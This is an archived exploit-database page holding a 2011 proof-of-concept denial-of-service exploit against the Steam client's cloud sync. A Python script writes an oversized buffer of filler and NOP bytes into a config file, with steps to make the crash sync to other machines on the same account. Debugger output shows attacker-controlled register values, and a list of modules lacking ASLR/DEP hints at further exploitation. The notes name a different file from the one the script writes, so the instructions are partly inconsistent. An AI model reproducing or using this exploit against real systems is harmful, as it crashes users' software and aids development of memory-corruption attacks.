what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Steam Cloud Denial Of Service

Steam Cloud Denial Of Service
Posted May 16, 2011
Authored by David R. Klein

Steam Cloud suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | 50dd11160d8ffe10cc9dbcc013fe67d028576b3170b94e14d7e4a9c051f53988

Steam Cloud Denial Of Service

Change Mirror Download
# Exploit Title: Steam Cloud Denial of Service 0day
# Date: 06042011
# Author: david.r.klein \x0agmail\x0acom
# Software Link: https://steampowered.com
# Version: Steam - Latest
# Tested on: Windows XP/2003, Windows7
# CVE : NA
#
# Notes: Copy file to C:\Program Files\Steam\userdata\<acctnums>\remote\sharedconfig.vdf
# Run Steam.exe and let the program crash. Steam will Sync your config to your account before the crash occurs
# Log in on a seperate computer with the same account and watch steam die.
#

test = "A" * 32776
test2= "BBBB" * 8
test2+="ZZZZ" * 8
test2+="\x90" * 32

f = open('serverbrowser_ui.vdf', 'w')
f.write(test + test2)
f.close()


# (78c.bf0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=02c915b0 ebx=000025d5 ecx=42424242 edx=01697b28 esi=02c915a8 edi=00eb0000
# eip=7c91240b esp=0012d188 ebp=0012d1a0 iopl=0 nv up ei ng nz na pe cy
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210287
# ntdll!RtlpInsertFreeBlock+0x10d:
# 7c91240b 8901 mov dword ptr [ecx],eax ds:0023:42424242=????????
#
# 0:000> d edx
# 01697b28 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
# 01697b38 5a 5a 5a 5a 5a 5a 5a 5a-5a 5a 5a 5a 5a 5a 5a 5a ZZZZZZZZZZZZZZZZ
# 01697b48 5a 5a 5a 5a 5a 5a 5a 5a-5a 5a 5a 5a 5a 5a 5a 5a ZZZZZZZZZZZZZZZZ
# 01697b58 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
# 01697b68 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................
# 01697b78 00 fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe ................
#
#
# None of the below have aslr \ dep \ safeseh
# ModLoad: 3a000000 3a363000 C:\Program Files\Steam\SteamUI.dll
# ModLoad: 3f000000 3f0ad000 C:\Program Files\Steam\tier0_s.dll
# ModLoad: 3f600000 3f66e000 C:\Program Files\Steam\vstdlib_s.dll
# ModLoad: 10000000 100af000 C:\Program Files\Steam\crashhandler.dll
# ModLoad: 3fa00000 3fa32000 C:\Program Files\Steam\bin\FileSystem_Steam.dll
# ModLoad: 3f200000 3f2a2000 C:\Program Files\Steam\bin\vgui2.dll
# ModLoad: 04120000 04e06000 C:\Program Files\Steam\bin\libcef.dll
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close